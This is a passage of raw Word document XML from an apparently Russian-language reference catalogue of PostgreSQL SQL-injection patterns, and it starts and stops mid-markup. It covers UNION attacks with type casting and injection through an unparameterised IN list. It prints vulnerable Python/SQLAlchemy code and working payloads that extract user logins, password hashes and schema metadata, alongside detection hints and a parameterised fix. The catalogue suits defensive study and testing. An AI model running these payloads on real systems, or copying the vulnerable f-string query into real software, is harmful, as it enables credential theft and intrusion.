          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT id, name, price FROM products WHERE id = 1 UNION SELECT NULL, version()::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075DB005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ответе клиент получает дополнительную строку с версией сервера в позиции колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3036604C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Склейка нескольких значений в одну позицию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31190B18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, (login || '|' || password_hash)::text, NULL FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB5623"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1 UNION SELECT NULL, (login || '|' || password_hash)::text, NULL FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB43BF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/products</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> начинает возвращать в ответе строки, не имеющие отношения к продуктам — credentials, версии БД, имена ролей. Возвращаются в том же JSON-формате через ту же колонку, что и легитимные данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6CE52B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Для каждой колонки UNION PostgreSQL применяет алгоритм определения общего типа. Если типы совместимы (есть implicit cast в общий тип), результат имеет этот общий тип. Если нет — сервер выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION types integer and text cannot be matched</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литерал имеет специальный тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unknown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и совместим с любым типом, поэтому используется как «заполнитель». Каст через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снимает проблему совместимости для любого исходного типа: каждый тип в PG имеет output-функцию, преобразующую значение в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0812F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все версии PG. Никаких специальных привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088A48B"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::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каст в SELECT — повседневная конструкция в отчётах, миграциях, debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D3261" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, product_name::text || ' (#' || sku::text || ')' AS label</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C226A76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM products;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B05AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не индикатор. Подозрительная комбинация — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>, появляющийся от инъекционной точки и не присутствующий в каноническом коде приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5FC17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D4DF51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1.1, 3.1.4, 3.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587DB8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Documentation: Type Conversion — UNION, CASE, and Related Constructs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE81C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.3 UNION внутри IN-списка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C447D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Когда инъекция попадает не в скалярное условие, а в IN-список, атакующий закрывает скобку IN, через UNION подсасывает свои данные, а оставшуюся часть исходного запроса (включая закрывающую скобку шаблона) убирает комментарием.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04D994" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771BA767" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/reports.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF213CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE8334" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C32BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.post("/orders/by_ids")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA35621" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_orders(ids: str):  # принимает "1,2,3" как строку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BDED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, customer_id, total FROM orders WHERE id IN ({ids})"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FE5EC"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31F45B16"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0657385B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19BAF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526B9FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Базовый вариант:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9654B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1, 2, 3) UNION SELECT id, login, password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FADF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>После подстановки сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7092CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_id, total FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC884E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IN (1, 2, 3) UNION SELECT id, login, password_hash FROM users--)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5FD44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Закрывающая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> шаблона попадает в комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и парсером игнорируется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191E6F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>С подгонкой типов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755602E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1) UNION SELECT NULL::int, login::text, password_hash::text FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9E660" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>С извлечением структуры схемы вместо данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7F354" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1) UNION SELECT NULL, n.nspname, c.relname FROM pg_class c JOIN pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind = 'r'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE9A22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/orders/by_ids</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает в ответе строки с credentials пользователей или с дампом структуры схемы вперемешку с ожидаемыми заказами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBE22A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Парсер обрабатывает SQL после полной текстовой подстановки. Конструкция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IN (1, 2, 3) UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> синтаксически валидна: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет более низкий приоритет, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и связывается с внешним SELECT, а не с подвыражением внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Закрывающая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> попадает в однострочный комментарий и не вызывает синтаксической ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002060F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Уязвимый код, склеивающий IN-список. Application-роль с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на целевые таблицы; для метаданных из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7534B94C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IN-список с числами — нормальная SQL-конструкция, в правильно написанном коде она параметризуется через массив: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = ANY($1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. См. 5.7.1. Сам факт IN в логах ничего не значит — подозрителен f-string или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>-склейка вокруг переменной длины списка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B58317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872A934" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
